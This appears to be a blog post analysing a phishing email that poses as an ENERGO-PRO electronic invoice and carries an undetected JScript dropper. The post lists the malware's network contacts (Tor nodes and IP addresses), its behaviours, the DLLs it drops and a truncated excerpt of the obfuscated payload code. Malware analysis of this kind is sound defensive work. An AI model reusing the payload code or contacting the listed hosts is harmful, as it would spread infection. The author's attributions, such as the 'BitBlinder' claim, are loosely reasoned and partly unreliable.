Unseen stample of malware-Modified coding code – DarkWeb TOR project.

Hello.
Today I had a nice surprise. I found in the Spam file an email telling me they just sent me an electronic invoice.
I have to say that the surprisses are more and more.

You will see!!!

Part 1 – The infected file & dropped files

Dear Madam / Madam,

We would like to inform you that you have an electronic invoice issued. The attachment is an official accounting document and complies with the requirements of the Electronic Document and Electronic Signature Act.
If you have additional questions or need other information, please do not hesitate to contact us with the contact details on your electronic invoice.
Thank you for being a customer of ENERGO-PRO.
We wish you a successful day.
* This email can contain personalized information. If you are not the recipient for whom it is intended, please delete it. Thank you!

I have a file attached named öá¬ÔŃÓá No 0258923817 (3)… yeeep and is a JScript file.
Scanned with Virus Total.

The -1 vote is mine! (lol).
So 0 of 60 antivirus engines detects this virus.In the previous article I wrote about the problem of detection.

Security Advice – The Antivirus is just a security helper!

Running the öá¬ÔŃÓá No 0258923817 (3) script –> injects code on vbscript and tries to connect to:

All the connection running this script:

• withadvertisingthe.com
• myip.opendns.com
• noreply.org
• riseup.ne
• Faravahar Tor Authority Directory – 199.254.238.52
• Tor Exit Router – 178.16.208.59
• vps.net
• 91.219.237.154
• digitalocean.com
• voxility.net

All are Tor servers and VPN servers.
GET /tor/status-vote/current/consensus from hosts:
86.59.21.38/154.35.175.225
There are BitBlinder Project files(see on github more informations). Remember this.. i will give you some good info later!
Connected servers:
5.149.213.224/86.59.21.38/199.254.238.52/154.35.175.225/178.16.208.59/46.23.72.81/91.219.237.154/46.101.183.160/93.115.84.143/165.227.130.167
What else to show you from this file…

Last write session:

Mades alot of changes after running:

• Remote AccessTries to identify its external IP address
• Stealer/PhishingScans for artifacts that may help identify the target
• Touched instant messenger related registry keysPersistenceInjects into explorer
• Injects into remote processes
• Modifies auto-execute functionality by setting/creating a value in the registry
• Spawns a lot of processes
• Writes data to a remote process

Dropped files:

• adprtext.dll
• agreebowl.dll

Let’s see the agreebowl.dll

Part 2 – The “öá¬ÔŃÓá No 0258923817 (3)” file code.

The 0/60 file detection is due to the programming mode. The programmer used an ingenious way to write the code to have a signature different from that of the viruses.
Here i will show you a part of thecompiled code:

ozen.decideWorry+sickCityAdditionDepth[15]+seriousPaidRegion.happened;}function pigDutyUnusual(passForeignPush){return lowerCountryCharacter[5];}function frontFurtherAfterMadeConstruction(wasMoodCleanRefusedPush){return slightForgotDiscussionHistoryGiant[3]+temperatureBeforeDo.audienceCircus+evidenceCompositionCrackPrincipalEar[2]+seriousPaidRegion.engineer+sickCityAdditionDepth[3]+sickCityAdditionDepth[4]+breatheCupParentEscape[13]+biggerShellsDeterminePorchCreature[7]+temperatureBeforeDo.twoWest+importanceArtAgain[7];}function compareSpeciesGiantBuildingSeveral(excitedCanScoreCarefulFine){return roughWhenPlentyDistanceFrozen.decideWorry+townOrdinaryDarkFlowerLibrary.careful+importanceArtAgain[7]+temperatureBeforeDo.audienceCircus+wonProvideMostOrdinaryRoad.railroadOr+slightForgotDiscussionHistoryGiant[7]+importanceArtAgain[7]+evidenceCompositionCrackPrincipalEar[2]+breatheCupParentEscape[17];}var clearlyPieceBillEarlierOrganization=[];
clearlyPieceBillEarlierOrganization[todayBehaviorStrengthQuietlyTypical(‘p-_sI1owb)jB:o6’)](visitorBehindSpeak(‘9
K0c0htw(o.kvr’));
var packageLargePig=[-314];
var tearsKitchenCatchNeck=[66];
var fifteenRunStraightSpeech=[];
var aidMirrorWeakProgressInclude=[7];
var sightDistanceDid=[1];
var taskAnywayHungry=[mightEmptyCarriedRapidlyOnce(’26P:Y&kwgPLW0′)];
function partRelatedBatBaby(metFreeSomeone){

Part 3 – BitBlinder project

BitBlinder project – A way to create your own hidden services on DarkWeb.
Project-specific files:

• http://154.35.175.225/tor/status-vote/current/consensus.js
• http://91.219.237.154/tor/server/fp/6a7479eb4378b946dc2a65a7f2c706b42bae2ebd

Well… that was a long story and the end it’s here!
0/60 … remember that!!!

Have fun & Stay safe!!!